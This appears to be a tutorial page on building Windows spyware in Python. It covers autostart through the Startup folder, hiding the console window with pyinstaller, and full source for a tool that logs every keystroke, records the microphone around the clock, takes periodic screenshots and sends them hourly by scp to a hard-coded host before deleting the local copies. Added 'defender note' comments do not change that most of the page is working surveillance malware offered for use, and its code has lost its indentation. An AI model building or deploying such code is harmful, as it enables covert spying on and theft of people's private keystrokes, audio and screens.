Auto-run
Auto-run
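This page discusses Windows executables.
Press Windows+R, then type shell:startup
It will open C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Anything in this folder will run at boot (more precisely, each time that user signs in). Because it is a well-known per-user autostart location, it is also one of the first places to check when reviewing a machine for unwanted startup entries.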
Create simple python exe
Real malware isn’t written in python lol but let’s run with this
pip install pyinstaller
pyinstaller yourfile.py -F --onefile
Make exe hidden
There will be a brief cmd popup whenever your script runs, very suspicious, let’s remove it.
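There are many tutorials and many different ways to do this, and they will probably change in future Windows versions.
A simple one in this case is to add --noconsole to the pyinstaller command. This only suppresses the console window; the process itself still appears in Task Manager and in process-creation logs.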
Recording audio
pip install pyaudio
import pyaudio
import wave
# Record `seconds` of stereo 16-bit audio from the default input device and
# write it to `filename` as a WAV file.
# NOTE(review): indentation was lost when this listing was extracted. Everything
# from here through wf.close() is presumably the body of record_audio, with the
# for-loop covering only the read/append pair -- confirm against the original.
# Defender note: this code opens the microphone without showing any prompt of
# its own; the operating system's per-app microphone privacy setting and its
# microphone-in-use indicator are what surface or block this kind of capture.
def record_audio(seconds, filename):
p = pyaudio.PyAudio()
# Capture parameters: 44100 frames per second, read 1024 frames at a time.
fs = 44100
chunk = 1024
# input=True opens the stream for capture rather than playback.
stream = p.open(format=pyaudio.paInt16,channels=2,rate=fs,frames_per_buffer=chunk,input=True)
# Every chunk is kept in memory; nothing reaches disk until the loop finishes.
frames = []
# fs / chunk reads per second, times the requested duration, truncated to int.
for _ in range(0, int(fs / chunk * seconds)):
data = stream.read(chunk)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
# Write the buffered frames out with a header matching the capture settings.
wf = wave.open(filename, 'wb')
wf.setnchannels(2)
# NOTE(review): p is used here after p.terminate() above -- confirm intended.
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(fs)
wf.writeframes(b''.join(frames))
wf.close()
# Example call: a 10-second recording written to output.wav in the current
# working directory.
record_audio(seconds=10, filename="output.wav")
Final
# scp ... connor@192.168.1.114:/home/connor/Documents/...
import threading
from pynput.keyboard import Key, Listener
import os
import pyaudio
import wave
from time import sleep, time
from PIL import ImageGrab
# Module-level state used by the keyboard callback further down: a counter of
# buffered key events and the buffer itself.
count = 0
keys = []
# The staging path is derived from the USERNAME environment variable. If the
# variable is unset, os.environ.get returns None and the path will contain the
# literal text "None".
user = os.environ.get("USERNAME")
# Defender note: everything this script collects is written under
# C:\Users\<user>\Documents\system\log (log.txt plus the audio and ss
# subfolders), so that directory is the on-disk artifact to look for.
basedir = f"C:\\Users\\{user}\\Documents\\system\\log"
# Delete the files staged in the audio and ss subfolders by shelling out to the
# Windows `del /Q` command. log.txt in basedir is not removed here.
# NOTE(review): indentation was lost in extraction; both os.system calls are
# presumably the body of cleanup -- confirm.
# Defender note: each os.system call runs through the command interpreter as a
# child of this process, so the deletions are visible in process-creation logs.
def cleanup():
os.system(f"del /Q {basedir}\\audio")
os.system(f"del /Q {basedir}\\ss")
# Create the staging directory and its audio and ss subfolders when they do not
# already exist. Presumably a top-level statement (indentation was lost in
# extraction), in which case it runs as soon as the script is loaded, before
# any thread is started.
for d in [basedir, f"{basedir}/audio", f"{basedir}/ss"]:
if not os.path.exists(d):
os.makedirs(d)
# Start a pynput keyboard Listener and append what is typed to
# {basedir}/log.txt. The call blocks in listener.join() while the listener runs.
# NOTE(review): indentation was lost in extraction; on_press, write_file and
# on_release are presumably nested inside handle_keys -- confirm.
# Defender note: a pynput Listener receives key events from the whole desktop
# session rather than from one window, which is the behaviour endpoint tools
# classify as keylogging; log.txt in the staging directory is the artifact.
def handle_keys():
# Callback for each key press: buffer the key and flush the buffer to disk.
def on_press(key):
global keys, count
keys.append(key)
count += 1
# The threshold is 1, so this is true after every single key press.
# NOTE(review): presumably the flush and the reset below belong to this if.
if (count >= 1):
count = 0
write_file(keys)
keys = []
# Append the buffered keys to log.txt in text form.
def write_file(keys):
with open (f"{basedir}/log.txt", "a") as f:
for key in keys:
# str(key) with the single quotes stripped.
k = str(key).replace("'","")
# A name containing "space" after position 0 is logged as a newline.
if k.find("space") > 0:
f.write("\n")
# Names without "Key" are written as-is; names that contain "Key" and
# did not match the branch above are not written at all.
elif k.find("Key") == -1:
f.write(k)
# Always returns True, so a key release never ends the listener.
def on_release(key):
return True #never release
with Listener(on_press = on_press, on_release = on_release) as listener:
listener.join()
# Record `seconds` of stereo 16-bit audio from the default input device and
# write it to `filename` in WAV format.
# NOTE(review): indentation was lost in extraction; everything through
# wf.close() is presumably the body of record_audio, with the for-loop covering
# only the read/append pair -- confirm.
# Defender note: this code opens the microphone without showing any prompt of
# its own; the operating system's per-app microphone privacy setting and its
# microphone-in-use indicator are what surface or block this kind of capture.
def record_audio(seconds, filename):
p = pyaudio.PyAudio()
# Capture parameters: 44100 frames per second, read 1024 frames at a time.
fs = 44100
chunk = 1024
# input=True opens the stream for capture rather than playback.
stream = p.open(format=pyaudio.paInt16,channels=2,rate=fs,frames_per_buffer=chunk,input=True)
# All captured chunks are held in memory until the recording has finished.
frames = []
# fs / chunk reads per second, times the requested duration, truncated to int.
for i in range(0, int(fs / chunk * seconds)):
data = stream.read(chunk)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
# Only now is anything written to disk, in a single pass.
wf = wave.open(filename, 'wb')
wf.setnchannels(2)
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(fs)
wf.writeframes(b''.join(frames))
wf.close()
# Record from the microphone in back-to-back 3500-second segments, forever.
# Each segment is written under {basedir}/audio and named with the Unix time at
# which it started; the name has no file extension.
# NOTE(review): indentation was lost in extraction; the two statements after
# `while True:` are presumably the loop body -- confirm.
# Defender note: record_audio buffers a whole segment in memory before writing,
# so the observable signs are continuous microphone use and a steadily growing
# process footprint, with a new file appearing in audio/ about once an hour.
def handle_audio():
while True:
fname = f"{basedir}/audio/{int(time())}"
record_audio(seconds=3500, filename=fname)
# Capture the screen with PIL's ImageGrab.grab() and save it as a .jpg under
# {basedir}/ss, named with the current Unix time, then sleep 20 minutes; the
# loop never exits.
# NOTE(review): indentation was lost in extraction; the four statements after
# `while True:` are presumably the loop body -- confirm.
# Defender note: the artifact is a set of epoch-named .jpg files accumulating in
# the ss subfolder of the staging directory at 20-minute intervals.
def handle_ss():
while True:
snapshot = ImageGrab.grab()
save_path = f"{basedir}/ss/{int(time())}.jpg"
snapshot.save(save_path)
# 20 * 60 seconds between captures.
sleep(20*60)
# Once an hour, copy the whole staging directory to a fixed remote host with
# `scp -r`, and call cleanup() when the command reports success.
# NOTE(review): indentation was lost in extraction; the sleep, the scp call and
# the success check are presumably all inside the while loop -- confirm.
# Defender note: this is the exfiltration step. It appears as an scp child
# process launched through the command interpreter roughly every 3600 seconds,
# making an outbound SSH connection to the address hard-coded below. Egress
# filtering and process-creation logging are the places to catch it.
def handle_send():
while True:
sleep(3600)
# stdout and stderr are both redirected to NUL, so the command prints nothing.
success = os.system(f"scp -r {basedir} connor@192.168.1.114:/home/connor/Documents/logs > NUL 2> NUL")
# os.system returns the command's exit status; 0 is treated as a successful copy.
if success == 0:
cleanup() # delete after sending
# Script entry point: run the four collectors (keyboard, audio, upload,
# screenshots) in parallel, one thread each.
# NOTE(review): indentation was lost in extraction; every statement below is
# presumably inside the __main__ guard -- confirm.
# Each target either loops on `while True` or blocks on the keyboard listener,
# so the join() calls at the end are not expected to return and the process
# stays resident until it is terminated.
if __name__ =="__main__":
t1 = threading.Thread(target=handle_keys)
t2 = threading.Thread(target=handle_audio)
t3 = threading.Thread(target=handle_send)
t4 = threading.Thread(target=handle_ss)
t1.start()
t2.start()
t3.start()
t4.start()
t1.join()
t2.join()
t3.join()
t4.join()